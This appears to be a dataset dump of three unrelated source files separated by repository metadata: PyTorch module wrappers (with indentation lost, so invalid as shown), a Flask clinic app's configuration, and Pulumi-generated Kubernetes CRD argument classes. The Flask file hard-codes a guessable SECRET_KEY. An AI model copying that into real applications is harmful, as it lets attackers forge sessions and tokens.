BatchNorm2d = blackbox_module(nn.BatchNorm2d)
BatchNorm3d = blackbox_module(nn.BatchNorm3d)
InstanceNorm1d = blackbox_module(nn.InstanceNorm1d)
InstanceNorm2d = blackbox_module(nn.InstanceNorm2d)
InstanceNorm3d = blackbox_module(nn.InstanceNorm3d)
LayerNorm = blackbox_module(nn.LayerNorm)
GroupNorm = blackbox_module(nn.GroupNorm)
SyncBatchNorm = blackbox_module(nn.SyncBatchNorm)
Dropout = blackbox_module(nn.Dropout)
Dropout2d = blackbox_module(nn.Dropout2d)
Dropout3d = blackbox_module(nn.Dropout3d)
AlphaDropout = blackbox_module(nn.AlphaDropout)
FeatureAlphaDropout = blackbox_module(nn.FeatureAlphaDropout)
ReflectionPad1d = blackbox_module(nn.ReflectionPad1d)
ReflectionPad2d = blackbox_module(nn.ReflectionPad2d)
ReplicationPad2d = blackbox_module(nn.ReplicationPad2d)
ReplicationPad1d = blackbox_module(nn.ReplicationPad1d)
ReplicationPad3d = blackbox_module(nn.ReplicationPad3d)
CrossMapLRN2d = blackbox_module(nn.CrossMapLRN2d)
Embedding = blackbox_module(nn.Embedding)
EmbeddingBag = blackbox_module(nn.EmbeddingBag)
RNNBase = blackbox_module(nn.RNNBase)
RNN = blackbox_module(nn.RNN)
LSTM = blackbox_module(nn.LSTM)
GRU = blackbox_module(nn.GRU)
RNNCellBase = blackbox_module(nn.RNNCellBase)
RNNCell = blackbox_module(nn.RNNCell)
LSTMCell = blackbox_module(nn.LSTMCell)
GRUCell = blackbox_module(nn.GRUCell)
PixelShuffle = blackbox_module(nn.PixelShuffle)
Upsample = blackbox_module(nn.Upsample)
UpsamplingNearest2d = blackbox_module(nn.UpsamplingNearest2d)
UpsamplingBilinear2d = blackbox_module(nn.UpsamplingBilinear2d)
PairwiseDistance = blackbox_module(nn.PairwiseDistance)
AdaptiveMaxPool1d = blackbox_module(nn.AdaptiveMaxPool1d)
AdaptiveMaxPool2d = blackbox_module(nn.AdaptiveMaxPool2d)
AdaptiveMaxPool3d = blackbox_module(nn.AdaptiveMaxPool3d)
AdaptiveAvgPool1d = blackbox_module(nn.AdaptiveAvgPool1d)
AdaptiveAvgPool2d = blackbox_module(nn.AdaptiveAvgPool2d)
AdaptiveAvgPool3d = blackbox_module(nn.AdaptiveAvgPool3d)
TripletMarginLoss = blackbox_module(nn.TripletMarginLoss)
ZeroPad2d = blackbox_module(nn.ZeroPad2d)
ConstantPad1d = blackbox_module(nn.ConstantPad1d)
ConstantPad2d = blackbox_module(nn.ConstantPad2d)
ConstantPad3d = blackbox_module(nn.ConstantPad3d)
Bilinear = blackbox_module(nn.Bilinear)
CosineSimilarity = blackbox_module(nn.CosineSimilarity)
Unfold = blackbox_module(nn.Unfold)
Fold = blackbox_module(nn.Fold)
AdaptiveLogSoftmaxWithLoss = blackbox_module(nn.AdaptiveLogSoftmaxWithLoss)
TransformerEncoder = blackbox_module(nn.TransformerEncoder)
TransformerDecoder = blackbox_module(nn.TransformerDecoder)
TransformerEncoderLayer = blackbox_module(nn.TransformerEncoderLayer)
TransformerDecoderLayer = blackbox_module(nn.TransformerDecoderLayer)
Transformer = blackbox_module(nn.Transformer)
Flatten = blackbox_module(nn.Flatten)
Hardsigmoid = blackbox_module(nn.Hardsigmoid)
if version_larger_equal(torch.__version__, '1.6.0'):
Hardswish = blackbox_module(nn.Hardswish)
if version_larger_equal(torch.__version__, '1.7.0'):
SiLU = blackbox_module(nn.SiLU)
Unflatten = blackbox_module(nn.Unflatten)
TripletMarginWithDistanceLoss = blackbox_module(nn.TripletMarginWithDistanceLoss)
| [
"noreply@github.com"
] | petuum.noreply@github.com |
c63bdf11f6a794f3a32e12e32d0fa2996d6ca271 | 8b0830a11b40d1b15fb938f9cc8378c6b4e589ad | /Clinic1.1.1 copy/flaskblog/__init__.py | d5f660e17b018cb59057b0d34824391d3a2adcc7 | [] | no_license | Ericsson0/Clinic-web | 827a64f6a37edfcee3be36467822585fca270d0b | 054195612fcb943e9b0970e4058bdf671d2eb89b | refs/heads/main | 2023-05-03T11:44:05.673358 | 2021-05-28T16:07:33 | 2021-05-28T16:07:33 | 352,113,077 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,460 | py | import os
import jwt
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_bcrypt import Bcrypt
from flask_login import LoginManager
from flask_mail import Mail
from flask_script import Manager
from flask_admin import Admin
from flask_admin.contrib.sqla import ModelView
from flask_datepicker import datepicker
from functools import wraps
app = Flask(__name__)
app.config['SECRET_KEY'] = 'thisisthesecretkey'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///user.db' # SQL db, connect to site.db
app.config['SQLALCHEMY_BINDS'] = {'work_log' : 'sqlite:///work-log.db',
'patient' : 'sqlite:///patient.db',
'medicine' : 'sqlite:///medicine.db',
'detail' : 'sqlite:///detail.db',
'admin' : 'sqlite:///admin.db',
'announcement' : 'sqlite:///announcement.db',
'newpatient' : 'sqlite:///new-patient.db'}
db = SQLAlchemy(app)
bcrypt = Bcrypt(app)
datepicker(app)
login_manager = LoginManager(app)
login_manager.login_view = 'login'
login_manager.login_message_category = 'info'
app.config['MAIL_SERVER'] = 'smtp.gmail.com'
app.config['MAIL_PORT'] = 587
app.config['MAIL_USE_TLS'] = True
app.config['MAIL_USERNAME'] = 'your email'
app.config['MAIL_PASSWORD'] = 'your email password'
mail = Mail(app)
from flaskblog import routes
| [
"noreply@github.com"
] | Ericsson0.noreply@github.com |
c0aa5d5329950ee81536b28948f3e1c23999d7b9 | 2f4605e878c073d7f735eed1d675c2ee454ad68e | /sdk/python/pulumi_kubernetes/apiextensions/v1/_inputs.py | a8642aba88bfc3ac6d4fd00a72d0776d3c88c9b0 | [
"Apache-2.0"
] | permissive | pulumi/pulumi-kubernetes | 3c0c82e03a19f4077625d2ff6dae5ea4dbf90243 | b5d76f0731383f39903f35a6c1566f2f4344c944 | refs/heads/master | 2023-08-17T16:57:11.845935 | 2023-08-16T00:55:18 | 2023-08-16T00:55:18 | 116,869,354 | 353 | 128 | Apache-2.0 | 2023-09-13T21:42:01 | 2018-01-09T20:50:33 | Java | UTF-8 | Python | false | false | 206,572 | py | # coding=utf-8
# *** WARNING: this file was generated by pulumigen. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import copy
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from ... import meta as _meta
__all__ = [
'CustomResourceColumnDefinitionPatchArgs',
'CustomResourceColumnDefinitionArgs',
'CustomResourceConversionPatchArgs',
'CustomResourceConversionArgs',
'CustomResourceDefinitionConditionArgs',
'CustomResourceDefinitionNamesPatchArgs',
'CustomResourceDefinitionNamesArgs',
'CustomResourceDefinitionSpecPatchArgs',
'CustomResourceDefinitionSpecArgs',
'CustomResourceDefinitionStatusArgs',
'CustomResourceDefinitionVersionPatchArgs',
'CustomResourceDefinitionVersionArgs',
'CustomResourceDefinitionArgs',
'CustomResourceSubresourceScalePatchArgs',
'CustomResourceSubresourceScaleArgs',
'CustomResourceSubresourcesPatchArgs',
'CustomResourceSubresourcesArgs',
'CustomResourceValidationPatchArgs',
'CustomResourceValidationArgs',
'ExternalDocumentationPatchArgs',
'ExternalDocumentationArgs',
'JSONSchemaPropsPatchArgs',
'JSONSchemaPropsArgs',
'ServiceReferencePatchArgs',
'ServiceReferenceArgs',
'ValidationRulePatchArgs',
'ValidationRuleArgs',
'WebhookClientConfigPatchArgs',
'WebhookClientConfigArgs',
'WebhookConversionPatchArgs',
'WebhookConversionArgs',
]
@pulumi.input_type
class CustomResourceColumnDefinitionPatchArgs:
def __init__(__self__, *,
description: Optional[pulumi.Input[str]] = None,
format: Optional[pulumi.Input[str]] = None,
json_path: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
priority: Optional[pulumi.Input[int]] = None,
type: Optional[pulumi.Input[str]] = None):
"""
CustomResourceColumnDefinition specifies a column for server side printing.
:param pulumi.Input[str] description: description is a human readable description of this column.
:param pulumi.Input[str] format: format is an optional OpenAPI type definition for this column. The 'name' format is applied to the primary identifier column to assist in clients identifying column is the resource name. See https://github.com/OAI/OpenAPI-Specification/blob/master/versions/2.0.md#data-types for details.
:param pulumi.Input[str] json_path: jsonPath is a simple JSON path (i.e. with array notation) which is evaluated against each custom resource to produce the value for this column.
:param pulumi.Input[str] name: name is a human readable name for the column.
:param pulumi.Input[int] priority: priority is an integer defining the relative importance of this column compared to others. Lower numbers are considered higher priority. Columns that may be omitted in limited space scenarios should be given a priority greater than 0.
:param pulumi.Input[str] type: type is an OpenAPI type definition for this column. See https://github.com/OAI/OpenAPI-Specification/blob/master/versions/2.0.md#data-types for details.
"""
if description is not None:
pulumi.set(__self__, "description", description)
if format is not None:
pulumi.set(__self__, "format", format)
if json_path is not None:
pulumi.set(__self__, "json_path", json_path)
if name is not None:
pulumi.set(__self__, "name", name)
if priority is not None:
pulumi.set(__self__, "priority", priority)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
description is a human readable description of this column.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def format(self) -> Optional[pulumi.Input[str]]:
"""
format is an optional OpenAPI type definition for this column. The 'name' format is applied to the primary identifier column to assist in clients identifying column is the resource name. See https://github.com/OAI/OpenAPI-Specification/blob/master/versions/2.0.md#data-types for details.
"""
return pulumi.get(self, "format")
@format.setter
def format(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "format", value)
@property
@pulumi.getter(name="jsonPath")
def json_path(self) -> Optional[pulumi.Input[str]]:
"""
jsonPath is a simple JSON path (i.e. with array notation) which is evaluated against each custom resource to produce the value for this column.
"""
return pulumi.get(self, "json_path")
@json_path.setter
def json_path(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "json_path", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
name is a human readable name for the column.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def priority(self) -> Optional[pulumi.Input[int]]:
"""
priority is an integer defining the relative importance of this column compared to others. Lower numbers are considered higher priority. Columns that may be omitted in limited space scenarios should be given a priority greater than 0.
"""
return pulumi.get(self, "priority")
@priority.setter
def priority(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "priority", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
"""
type is an OpenAPI type definition for this column. See https://github.com/OAI/OpenAPI-Specification/blob/master/versions/2.0.md#data-types for details.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@pulumi.input_type
class CustomResourceColumnDefinitionArgs:
def __init__(__self__, *,
json_path: pulumi.Input[str],
name: pulumi.Input[str],
type: pulumi.Input[str],
description: Optional[pulumi.Input[str]] = None,
format: Optional[pulumi.Input[str]] = None,
priority: Optional[pulumi.Input[int]] = None):
"""
CustomResourceColumnDefinition specifies a column for server side printing.
:param pulumi.Input[str] json_path: jsonPath is a simple JSON path (i.e. with array notation) which is evaluated against each custom resource to produce the value for this column.
:param pulumi.Input[str] name: name is a human readable name for the column.
:param pulumi.Input[str] type: type is an OpenAPI type definition for this column. See https://github.com/OAI/OpenAPI-Specification/blob/master/versions/2.0.md#data-types for details.
:param pulumi.Input[str] description: description is a human readable description of this column.
:param pulumi.Input[str] format: format is an optional OpenAPI type definition for this column. The 'name' format is applied to the primary identifier column to assist in clients identifying column is the resource name. See https://github.com/OAI/OpenAPI-Specification/blob/master/versions/2.0.md#data-types for details.
:param pulumi.Input[int] priority: priority is an integer defining the relative importance of this column compared to others. Lower numbers are considered higher priority. Columns that may be omitted in limited space scenarios should be given a priority greater than 0.
"""
pulumi.set(__self__, "json_path", json_path)
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "type", type)
if description is not None:
pulumi.set(__self__, "description", description)
if format is not None:
pulumi.set(__self__, "format", format)
if priority is not None:
pulumi.set(__self__, "priority", priority)
@property
@pulumi.getter(name="jsonPath")
def json_path(self) -> pulumi.Input[str]:
"""
jsonPath is a simple JSON path (i.e. with array notation) which is evaluated against each custom resource to produce the value for this column.
"""
return pulumi.get(self, "json_path")
@json_path.setter
def json_path(self, value: pulumi.Input[str]):
pulumi.set(self, "json_path", value)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
name is a human readable name for the column.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
type is an OpenAPI type definition for this column. See https://github.com/OAI/OpenAPI-Specification/blob/master/versions/2.0.md#data-types for details.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
description is a human readable description of this column.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def format(self) -> Optional[pulumi.Input[str]]:
"""
format is an optional OpenAPI type definition for this column. The 'name' format is applied to the primary identifier column to assist in clients identifying column is the resource name. See https://github.com/OAI/OpenAPI-Specification/blob/master/versions/2.0.md#data-types for details.
"""
return pulumi.get(self, "format")
@format.setter
def format(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "format", value)
@property
@pulumi.getter
def priority(self) -> Optional[pulumi.Input[int]]:
"""
priority is an integer defining the relative importance of this column compared to others. Lower numbers are considered higher priority. Columns that may be omitted in limited space scenarios should be given a priority greater than 0.
"""
return pulumi.get(self, "priority")
@priority.setter
def priority(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "priority", value)
@pulumi.input_type
class CustomResourceConversionPatchArgs:
def __init__(__self__, *,
strategy: Optional[pulumi.Input[str]] = None,
webhook: Optional[pulumi.Input['WebhookConversionPatchArgs']] = None):
"""
CustomResourceConversion describes how to convert different versions of a CR.
:param pulumi.Input[str] strategy: strategy specifies how custom resources are converted between versions. Allowed values are: - `"None"`: The converter only change the apiVersion and would not touch any other field in the custom resource. - `"Webhook"`: API Server will call to an external webhook to do the conversion. Additional information
is needed for this option. This requires spec.preserveUnknownFields to be false, and spec.conversion.webhook to be set.
:param pulumi.Input['WebhookConversionPatchArgs'] webhook: webhook describes how to call the conversion webhook. Required when `strategy` is set to `"Webhook"`.
"""
if strategy is not None:
pulumi.set(__self__, "strategy", strategy)
if webhook is not None:
pulumi.set(__self__, "webhook", webhook)
@property
@pulumi.getter
def strategy(self) -> Optional[pulumi.Input[str]]:
"""
strategy specifies how custom resources are converted between versions. Allowed values are: - `"None"`: The converter only change the apiVersion and would not touch any other field in the custom resource. - `"Webhook"`: API Server will call to an external webhook to do the conversion. Additional information
is needed for this option. This requires spec.preserveUnknownFields to be false, and spec.conversion.webhook to be set.
"""
return pulumi.get(self, "strategy")
@strategy.setter
def strategy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "strategy", value)
@property
@pulumi.getter
def webhook(self) -> Optional[pulumi.Input['WebhookConversionPatchArgs']]:
"""
webhook describes how to call the conversion webhook. Required when `strategy` is set to `"Webhook"`.
"""
return pulumi.get(self, "webhook")
@webhook.setter
def webhook(self, value: Optional[pulumi.Input['WebhookConversionPatchArgs']]):
pulumi.set(self, "webhook", value)
@pulumi.input_type
class CustomResourceConversionArgs:
def __init__(__self__, *,
strategy: pulumi.Input[str],
webhook: Optional[pulumi.Input['WebhookConversionArgs']] = None):
"""
CustomResourceConversion describes how to convert different versions of a CR.
:param pulumi.Input[str] strategy: strategy specifies how custom resources are converted between versions. Allowed values are: - `"None"`: The converter only change the apiVersion and would not touch any other field in the custom resource. - `"Webhook"`: API Server will call to an external webhook to do the conversion. Additional information
is needed for this option. This requires spec.preserveUnknownFields to be false, and spec.conversion.webhook to be set.
:param pulumi.Input['WebhookConversionArgs'] webhook: webhook describes how to call the conversion webhook. Required when `strategy` is set to `"Webhook"`.
"""
pulumi.set(__self__, "strategy", strategy)
if webhook is not None:
pulumi.set(__self__, "webhook", webhook)
@property
@pulumi.getter
def strategy(self) -> pulumi.Input[str]:
"""
strategy specifies how custom resources are converted between versions. Allowed values are: - `"None"`: The converter only change the apiVersion and would not touch any other field in the custom resource. - `"Webhook"`: API Server will call to an external webhook to do the conversion. Additional information
is needed for this option. This requires spec.preserveUnknownFields to be false, and spec.conversion.webhook to be set.
"""
return pulumi.get(self, "strategy")
@strategy.setter
def strategy(self, value: pulumi.Input[str]):
pulumi.set(self, "strategy", value)
@property
@pulumi.getter
def webhook(self) -> Optional[pulumi.Input['WebhookConversionArgs']]:
"""
webhook describes how to call the conversion webhook. Required when `strategy` is set to `"Webhook"`.
"""
return pulumi.get(self, "webhook")
@webhook.setter
def webhook(self, value: Optional[pulumi.Input['WebhookConversionArgs']]):
pulumi.set(self, "webhook", value)
@pulumi.input_type
class CustomResourceDefinitionConditionArgs:
def __init__(__self__, *,
status: pulumi.Input[str],
type: pulumi.Input[str],
last_transition_time: Optional[pulumi.Input[str]] = None,
message: Optional[pulumi.Input[str]] = None,
reason: Optional[pulumi.Input[str]] = None):
"""
CustomResourceDefinitionCondition contains details for the current condition of this pod.
:param pulumi.Input[str] status: status is the status of the condition. Can be True, False, Unknown.
:param pulumi.Input[str] type: type is the type of the condition. Types include Established, NamesAccepted and Terminating.
:param pulumi.Input[str] last_transition_time: lastTransitionTime last time the condition transitioned from one status to another.
:param pulumi.Input[str] message: message is a human-readable message indicating details about last transition.
:param pulumi.Input[str] reason: reason is a unique, one-word, CamelCase reason for the condition's last transition.
"""
pulumi.set(__self__, "status", status)
pulumi.set(__self__, "type", type)
if last_transition_time is not None:
pulumi.set(__self__, "last_transition_time", last_transition_time)
if message is not None:
pulumi.set(__self__, "message", message)
if reason is not None:
pulumi.set(__self__, "reason", reason)
@property
@pulumi.getter
def status(self) -> pulumi.Input[str]:
"""
status is the status of the condition. Can be True, False, Unknown.
"""
return pulumi.get(self, "status")
@status.setter
def status(self, value: pulumi.Input[str]):
pulumi.set(self, "status", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
type is the type of the condition. Types include Established, NamesAccepted and Terminating.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="lastTransitionTime")
def last_transition_time(self) -> Optional[pulumi.Input[str]]:
"""
lastTransitionTime last time the condition transitioned from one status to another.
"""
return pulumi.get(self, "last_transition_time")
@last_transition_time.setter
def last_transition_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "last_transition_time", value)
@property
@pulumi.getter
def message(self) -> Optional[pulumi.Input[str]]:
"""
message is a human-readable message indicating details about last transition.
"""
return pulumi.get(self, "message")
@message.setter
def message(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "message", value)
@property
@pulumi.getter
def reason(self) -> Optional[pulumi.Input[str]]:
"""
reason is a unique, one-word, CamelCase reason for the condition's last transition.
"""
return pulumi.get(self, "reason")
@reason.setter
def reason(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "reason", value)
@pulumi.input_type
class CustomResourceDefinitionNamesPatchArgs:
def __init__(__self__, *,
categories: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
kind: Optional[pulumi.Input[str]] = None,
list_kind: Optional[pulumi.Input[str]] = None,
plural: Optional[pulumi.Input[str]] = None,
short_names: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
singular: Optional[pulumi.Input[str]] = None):
"""
CustomResourceDefinitionNames indicates the names to serve this CustomResourceDefinition
:param pulumi.Input[Sequence[pulumi.Input[str]]] categories: categories is a list of grouped resources this custom resource belongs to (e.g. 'all'). This is published in API discovery documents, and used by clients to support invocations like `kubectl get all`.
:param pulumi.Input[str] kind: kind is the serialized kind of the resource. It is normally CamelCase and singular. Custom resource instances will use this value as the `kind` attribute in API calls.
:param pulumi.Input[str] list_kind: listKind is the serialized kind of the list for this resource. Defaults to "`kind`List".
:param pulumi.Input[str] plural: plural is the plural name of the resource to serve. The custom resources are served under `/apis/<group>/<version>/.../<plural>`. Must match the name of the CustomResourceDefinition (in the form `<names.plural>.<group>`). Must be all lowercase.
:param pulumi.Input[Sequence[pulumi.Input[str]]] short_names: shortNames are short names for the resource, exposed in API discovery documents, and used by clients to support invocations like `kubectl get <shortname>`. It must be all lowercase.
:param pulumi.Input[str] singular: singular is the singular name of the resource. It must be all lowercase. Defaults to lowercased `kind`.
"""
if categories is not None:
pulumi.set(__self__, "categories", categories)
if kind is not None:
pulumi.set(__self__, "kind", kind)
if list_kind is not None:
pulumi.set(__self__, "list_kind", list_kind)
if plural is not None:
pulumi.set(__self__, "plural", plural)
if short_names is not None:
pulumi.set(__self__, "short_names", short_names)
if singular is not None:
pulumi.set(__self__, "singular", singular)
@property
@pulumi.getter
def categories(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
categories is a list of grouped resources this custom resource belongs to (e.g. 'all'). This is published in API discovery documents, and used by clients to support invocations like `kubectl get all`.
"""
return pulumi.get(self, "categories")
@categories.setter
def categories(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "categories", value)
@property
@pulumi.getter
def kind(self) -> Optional[pulumi.Input[str]]:
"""
kind is the serialized kind of the resource. It is normally CamelCase and singular. Custom resource instances will use this value as the `kind` attribute in API calls.
"""
return pulumi.get(self, "kind")
@kind.setter
def kind(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "kind", value)
@property
@pulumi.getter(name="listKind")
def list_kind(self) -> Optional[pulumi.Input[str]]:
"""
listKind is the serialized kind of the list for this resource. Defaults to "`kind`List".
"""
return pulumi.get(self, "list_kind")
@list_kind.setter
def list_kind(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "list_kind", value)
@property
@pulumi.getter
def plural(self) -> Optional[pulumi.Input[str]]:
"""
plural is the plural name of the resource to serve. The custom resources are served under `/apis/<group>/<version>/.../<plural>`. Must match the name of the CustomResourceDefinition (in the form `<names.plural>.<group>`). Must be all lowercase.
"""
return pulumi.get(self, "plural")
@plural.setter
def plural(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "plural", value)
@property
@pulumi.getter(name="shortNames")
def short_names(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
shortNames are short names for the resource, exposed in API discovery documents, and used by clients to support invocations like `kubectl get <shortname>`. It must be all lowercase.
"""
return pulumi.get(self, "short_names")
@short_names.setter
def short_names(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "short_names", value)
@property
@pulumi.getter
def singular(self) -> Optional[pulumi.Input[str]]:
"""
singular is the singular name of the resource. It must be all lowercase. Defaults to lowercased `kind`.
"""
return pulumi.get(self, "singular")
@singular.setter
def singular(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "singular", value)
@pulumi.input_type
class CustomResourceDefinitionNamesArgs:
def __init__(__self__, *,
kind: pulumi.Input[str],
plural: pulumi.Input[str],
categories: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
list_kind: Optional[pulumi.Input[str]] = None,
short_names: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
singular: Optional[pulumi.Input[str]] = None):
"""
CustomResourceDefinitionNames indicates the names to serve this CustomResourceDefinition
:param pulumi.Input[str] kind: kind is the serialized kind of the resource. It is normally CamelCase and singular. Custom resource instances will use this value as the `kind` attribute in API calls.
:param pulumi.Input[str] plural: plural is the plural name of the resource to serve. The custom resources are served under `/apis/<group>/<version>/.../<plural>`. Must match the name of the CustomResourceDefinition (in the form `<names.plural>.<group>`). Must be all lowercase.
:param pulumi.Input[Sequence[pulumi.Input[str]]] categories: categories is a list of grouped resources this custom resource belongs to (e.g. 'all'). This is published in API discovery documents, and used by clients to support invocations like `kubectl get all`.
:param pulumi.Input[str] list_kind: listKind is the serialized kind of the list for this resource. Defaults to "`kind`List".
:param pulumi.Input[Sequence[pulumi.Input[str]]] short_names: shortNames are short names for the resource, exposed in API discovery documents, and used by clients to support invocations like `kubectl get <shortname>`. It must be all lowercase.
:param pulumi.Input[str] singular: singular is the singular name of the resource. It must be all lowercase. Defaults to lowercased `kind`.
"""
pulumi.set(__self__, "kind", kind)
pulumi.set(__self__, "plural", plural)
if categories is not None:
pulumi.set(__self__, "categories", categories)
if list_kind is not None:
pulumi.set(__self__, "list_kind", list_kind)
if short_names is not None:
pulumi.set(__self__, "short_names", short_names)
if singular is not None:
pulumi.set(__self__, "singular", singular)
@property
@pulumi.getter
def kind(self) -> pulumi.Input[str]:
"""
kind is the serialized kind of the resource. It is normally CamelCase and singular. Custom resource instances will use this value as the `kind` attribute in API calls.
"""
return pulumi.get(self, "kind")
@kind.setter
def kind(self, value: pulumi.Input[str]):
pulumi.set(self, "kind", value)
@property
@pulumi.getter
def plural(self) -> pulumi.Input[str]:
"""
plural is the plural name of the resource to serve. The custom resources are served under `/apis/<group>/<version>/.../<plural>`. Must match the name of the CustomResourceDefinition (in the form `<names.plural>.<group>`). Must be all lowercase.
"""
return pulumi.get(self, "plural")
@plural.setter
def plural(self, value: pulumi.Input[str]):
pulumi.set(self, "plural", value)
@property
@pulumi.getter
def categories(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
categories is a list of grouped resources this custom resource belongs to (e.g. 'all'). This is published in API discovery documents, and used by clients to support invocations like `kubectl get all`.
"""
return pulumi.get(self, "categories")
@categories.setter
def categories(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "categories", value)
@property
@pulumi.getter(name="listKind")
def list_kind(self) -> Optional[pulumi.Input[str]]:
"""
listKind is the serialized kind of the list for this resource. Defaults to "`kind`List".
"""
return pulumi.get(self, "list_kind")
@list_kind.setter
def list_kind(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "list_kind", value)
@property
@pulumi.getter(name="shortNames")
def short_names(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
shortNames are short names for the resource, exposed in API discovery documents, and used by clients to support invocations like `kubectl get <shortname>`. It must be all lowercase.
"""
return pulumi.get(self, "short_names")
@short_names.setter
def short_names(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "short_names", value)
@property
@pulumi.getter
def singular(self) -> Optional[pulumi.Input[str]]:
"""
singular is the singular name of the resource. It must be all lowercase. Defaults to lowercased `kind`.
"""
return pulumi.get(self, "singular")
@singular.setter
def singular(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "singular", value)
@pulumi.input_type
class CustomResourceDefinitionSpecPatchArgs:
def __init__(__self__, *,
conversion: Optional[pulumi.Input['CustomResourceConversionPatchArgs']] = None,
group: Optional[pulumi.Input[str]] = None,
names: Optional[pulumi.Input['CustomResourceDefinitionNamesPatchArgs']] = None,
preserve_unknown_fields: Optional[pulumi.Input[bool]] = None,
scope: Optional[pulumi.Input[str]] = None,
versions: Optional[pulumi.Input[Sequence[pulumi.Input['CustomResourceDefinitionVersionPatchArgs']]]] = None):
"""
CustomResourceDefinitionSpec describes how a user wants their resource to appear
:param pulumi.Input['CustomResourceConversionPatchArgs'] conversion: conversion defines conversion settings for the CRD.
:param pulumi.Input[str] group: group is the API group of the defined custom resource. The custom resources are served under `/apis/<group>/...`. Must match the name of the CustomResourceDefinition (in the form `<names.plural>.<group>`).
:param pulumi.Input['CustomResourceDefinitionNamesPatchArgs'] names: names specify the resource and kind names for the custom resource.
:param pulumi.Input[bool] preserve_unknown_fields: preserveUnknownFields indicates that object fields which are not specified in the OpenAPI schema should be preserved when persisting to storage. apiVersion, kind, metadata and known fields inside metadata are always preserved. This field is deprecated in favor of setting `x-preserve-unknown-fields` to true in `spec.versions[*].schema.openAPIV3Schema`. See https://kubernetes.io/docs/tasks/extend-kubernetes/custom-resources/custom-resource-definitions/#field-pruning for details.
:param pulumi.Input[str] scope: scope indicates whether the defined custom resource is cluster- or namespace-scoped. Allowed values are `Cluster` and `Namespaced`.
:param pulumi.Input[Sequence[pulumi.Input['CustomResourceDefinitionVersionPatchArgs']]] versions: versions is the list of all API versions of the defined custom resource. Version names are used to compute the order in which served versions are listed in API discovery. If the version string is "kube-like", it will sort above non "kube-like" version strings, which are ordered lexicographically. "Kube-like" versions start with a "v", then are followed by a number (the major version), then optionally the string "alpha" or "beta" and another number (the minor version). These are sorted first by GA > beta > alpha (where GA is a version with no suffix such as beta or alpha), and then by comparing major version, then minor version. An example sorted list of versions: v10, v2, v1, v11beta2, v10beta3, v3beta1, v12alpha1, v11alpha2, foo1, foo10.
"""
if conversion is not None:
pulumi.set(__self__, "conversion", conversion)
if group is not None:
pulumi.set(__self__, "group", group)
if names is not None:
pulumi.set(__self__, "names", names)
if preserve_unknown_fields is not None:
pulumi.set(__self__, "preserve_unknown_fields", preserve_unknown_fields)
if scope is not None:
pulumi.set(__self__, "scope", scope)
if versions is not None:
pulumi.set(__self__, "versions", versions)
@property
@pulumi.getter
def conversion(self) -> Optional[pulumi.Input['CustomResourceConversionPatchArgs']]:
"""
conversion defines conversion settings for the CRD.
"""
return pulumi.get(self, "conversion")
@conversion.setter
def conversion(self, value: Optional[pulumi.Input['CustomResourceConversionPatchArgs']]):
pulumi.set(self, "conversion", value)
@property
@pulumi.getter
def group(self) -> Optional[pulumi.Input[str]]:
"""
